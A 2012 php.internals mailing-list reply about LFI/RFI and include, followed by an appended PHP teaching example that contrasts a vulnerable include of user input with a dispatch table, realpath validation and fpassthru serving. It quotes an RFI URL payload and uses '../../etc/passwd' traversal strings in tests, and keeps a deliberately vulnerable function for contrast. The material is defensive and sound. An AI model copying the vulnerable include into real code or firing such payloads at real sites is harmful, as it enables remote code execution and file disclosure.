Newsgroups: php.internals
Subject: Re: [PHP-DEV] Re: Disabling PHP tags by php.ini and CLI options
From: Chris Stockton <chrisstocktonaz@gmail.com>
To: Kris Craig
Cc: John Crenshaw, Rasmus Lerdorf, Stas Malyshev, Yasuo Ohgaki, internals@lists.php.net
Date: Wed, 11 Apr 2012 11:08:23 -0700

Hello,

On Wed, Apr 11, 2012 at 10:53 AM, Kris Craig wrote:
> I can't help but question whether we should even be worrying about LFI/RFI
> to begin with. Personally, I would *never* check off on code that in any
> way used $_GET or $_POST directly in an include/require statement! It's
> just plain lazy. There's just no excuse for doing that. Use some sort of
> dispatch or translation table. Sure, it might seem less "magical," but
> it'll also protect you from some asshole hitting you with something like
> "?file=http://hacksite.com/injectedcode.php?". The individual code
> developer has to take *some* responsibility for their code. If this is
> such a problem, I would think the solution would be to update our docs to
> better warn people about this type of attack and educate them on how not to
> write code that's vulnerable to it.
>
> We can make the language secure; but, in the end, a language is only as
> smart as the person using it.

I really have a hard time understanding how this is even being discussed;
there is no real problem here. Making sure user input is validated is a core
concept of application development. How on earth can you say "if you don't
validate the user's input, it's a security problem, so PHP must fix it"? It's
the most ridiculous argument I have read on here in ages.

_IF_ you absolutely must accept arbitrary URLs from users, which we all have
to do at some point, you use socket functions, file functions, the HTTP
extension, whatever you want. If you are using INCLUDE you are using the
WRONG TOOL. You are WRONG.

_IF_ you need to display downloaded user data on a page, an image for
example, you need to use file functions, fpassthru, something of the sort.
If you are using INCLUDE to do this, you are using the WRONG TOOL. You are
WRONG.

_IF_ you for some reason must accept LOCAL PATHS from a user, and you do not
want to pass that input through a validation layer, you are WRONG.

It boils down to this: either you use the right tools and the right
validation methods, or, I promise, this is only one of unlimited possible
security concerns, Yasuo.

-Chris
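The three patterns argued about above, as an added example that is not part of the thread and not PHP project code: the `include $_GET['file']` shape that gives you LFI/RFI, the dispatch table Kris Craig suggests, the realpath-based validation layer for the rare case where a local path really must come from the user, and fpassthru() for serving downloaded data instead of including it. The `pages/` and download directories, the helper names and the `?p=` parameter are assumptions made for the example.

```php
<?php
// Added example for the php.internals thread above; not the list's or PHP's own code.
// Directory names, helper names and the ?p= query parameter are assumptions.

// VULNERABLE: the pattern the thread condemns. ?file=http://evil.example/x.php
// is RFI if allow_url_include=On, and ?file=../../../etc/passwd is LFI regardless.
function render_unsafe(array $query): void
{
    include $query['file']; // user input reaches include: never do this
}

// HARDENED 1: dispatch table. The user supplies a key, never a path. Anything
// not in the table (empty string, arrays, traversal, URLs) resolves to null.
const PAGE_TABLE = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

function resolve_page($key): ?string
{
    if (!is_string($key)) {
        return null; // ?p[]=x arrives as an array; reject it
    }
    return PAGE_TABLE[$key] ?? null;
}

// HARDENED 2: the "validation layer" for a user-supplied local path. Canonicalise
// with realpath() and require the result to stay under $base.
function resolve_local(string $base, string $userPath): ?string
{
    $baseReal = realpath($base);
    if ($baseReal === false || strpos($userPath, "\0") !== false) {
        return null; // unknown base, or NUL byte (truncates paths in older PHP)
    }
    $candidate = realpath($baseReal . DIRECTORY_SEPARATOR . $userPath);
    if ($candidate === false) {
        return null; // nonexistent or unresolvable; realpath() follows ".." and symlinks
    }
    // Compare with a trailing separator so /srv/dl2 is not accepted for base /srv/dl
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null; // escaped the base directory
    }
    return is_file($candidate) ? $candidate : null;
}

// HARDENED 3: serve downloaded data with file functions, not include. The bytes
// are copied to the client and never parsed as PHP.
function serve_file(string $path, string $contentType): bool
{
    $fh = fopen($path, 'rb');
    if ($fh === false) {
        return false;
    }
    header('Content-Type: ' . $contentType);
    header('Content-Length: ' . filesize($path));
    header('X-Content-Type-Options: nosniff');
    fpassthru($fh);
    fclose($fh);
    return true;
}

// Offline self-check: builds a throwaway directory and exercises resolve_local().
function self_check(): bool
{
    $dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lfi_demo_' . getmypid();
    mkdir($dir);
    file_put_contents($dir . DIRECTORY_SEPARATOR . 'img.png', 'not really a png');
    $ok = resolve_local($dir, 'img.png') !== null
       && resolve_local($dir, '../../etc/passwd') === null
       && resolve_local($dir, "img.png\0.txt") === null
       && resolve_local($dir, 'http://hacksite.com/injectedcode.php') === null
       && resolve_page('home') === 'pages/home.php'
       && resolve_page('../etc/passwd') === null
       && resolve_page(['x']) === null;
    unlink($dir . DIRECTORY_SEPARATOR . 'img.png');
    rmdir($dir);
    return $ok;
}

if (PHP_SAPI === 'cli') {
    echo self_check() ? "self-check passed\n" : "self-check FAILED\n";
    exit;
}

// Front-controller usage sketch (web SAPI):
$page = resolve_page($_GET['p'] ?? 'home');
if ($page === null) {
    http_response_code(404);
    exit;
}
include $page; // the path came from PAGE_TABLE, not from the request
```

Run it from the command line (`php example.php`) to exercise the checks; under a web server the tail acts as a minimal front controller. The table in HARDENED 1 is the cheapest fix and the one to reach for first: once the request carries only a key, there is no path for `allow_url_include`, `../` or NUL bytes to matter. HARDENED 2 still does a filesystem lookup on attacker-influenced input, so keep it for data files only, never for anything that is subsequently included.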